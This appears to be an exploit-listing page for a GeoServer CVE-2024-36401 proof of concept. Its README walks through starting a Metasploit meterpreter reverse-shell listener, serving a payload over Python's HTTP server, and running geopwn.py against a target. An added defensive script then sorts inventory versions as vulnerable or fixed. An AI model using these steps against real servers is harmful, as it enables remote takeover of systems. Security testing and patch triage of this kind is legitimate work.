## https://sploitus.com/exploit?id=90DE6307-8FEB-54DD-AD6A-6D61568E82CC
# CVE-2024-36401-PoC
Proof-of-Concept Exploit for CVE-2024-36401 GeoServer<br>
GeoServer versions prior to 2.23.6, 2.24.4 and 2.25.2 are vulnerable.<br>

!!! FOR SECURITY TESTING PURPOSES ONLY !!! <br>
\******************************************************<br>
DO NOT USE THIS ON SYSTEMS THAT YOU DO NOT <br>
OWN UNLESS YOU HAVE EXPRESS PERMISSION !!!

To run...
1. Start a listener in Metasploit
   - ```
     msf6 > use exploit/multi/handler
     msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
     msf6 exploit(multi/handler) > set LHOST 10.10.10.1 <--(set to your IP)
     msf6 exploit(multi/handler) > set LPORT 1234 <--(you can leave default, or change to your preference)
     msf6 exploit(multi/handler) > run

     [*] Started reverse TCP handler on 10.10.10.1:1234
     ```
2. Start HTTP server with Python
   - ```
     hacker@kali~> python3 -m http.server
     Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
     ```
3. Run exploit
   - ```
     hacker@kali~> python3 ./geopwn.py <target_domain_or_IP> <payload_URL> <LHOST> <LPORT>
     ```
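
For defenders checking an inventory against the version line at the top of this README, the following is an added example (not part of the original repository or of `geopwn.py`). It assumes the three versions listed are the fixed releases of the 2.23.x, 2.24.x and 2.25.x branches, that older branches have no fixed release, and that newer branches are unaffected; the host names and the function names are hypothetical.

```python
import re

# Fixed release per branch, from the README's version line (2.23.6 | 2.24.4 | 2.25.2).
FIXED = {(2, 23): 6, (2, 24): 4, (2, 25): 2}
OLDEST, NEWEST = min(FIXED), max(FIXED)

# major.minor[.patch] with an optional pre-release tag such as -SNAPSHOT or -RC1.
_VERSION_RE = re.compile(
    r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?(?:[-.](SNAPSHOT|RC\d*|M\d+|beta\d*))?\s*$", re.I)


def classify(version):
    """Return 'vulnerable', 'fixed' or 'unknown' for a reported GeoServer version."""
    m = _VERSION_RE.match(version or "")
    if not m:
        return "unknown"                      # unparseable: check the host by hand
    branch = (int(m.group(1)), int(m.group(2)))
    if branch < OLDEST:
        return "vulnerable"                   # older than every branch with a listed fix
    if m.group(3) is None:
        return "unknown"                      # e.g. 2.25-SNAPSHOT: patch level not stated
    patch, prerelease = int(m.group(3)), m.group(4) is not None
    if branch in FIXED:
        if patch < FIXED[branch]:
            return "vulnerable"
        # A pre-release of the fixed version may predate the fix itself.
        return "unknown" if patch == FIXED[branch] and prerelease else "fixed"
    if branch > NEWEST:
        return "unknown" if prerelease else "fixed"
    return "unknown"


def triage(inventory):
    """Group hosts (host -> reported version) by classification."""
    report = {"vulnerable": [], "fixed": [], "unknown": []}
    for host, version in sorted(inventory.items()):
        report[classify(version)].append(host)
    return report


# Constructed sample inventory; host names and versions are made up for illustration.
SAMPLE = {
    "gis-a.example": "2.25.1", "gis-b.example": "2.25.2", "gis-c.example": "2.9.4",
    "gis-d.example": "2.24.10", "gis-e.example": "2.25-SNAPSHOT", "gis-f.example": "n/a",
}

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE).items():
        print(f"{status:10} {', '.join(hosts) or '-'}")
```

Version components are compared as integers, so `2.9.4` sorts below `2.23.6` and `2.24.10` above `2.24.4`; a string comparison would get both wrong.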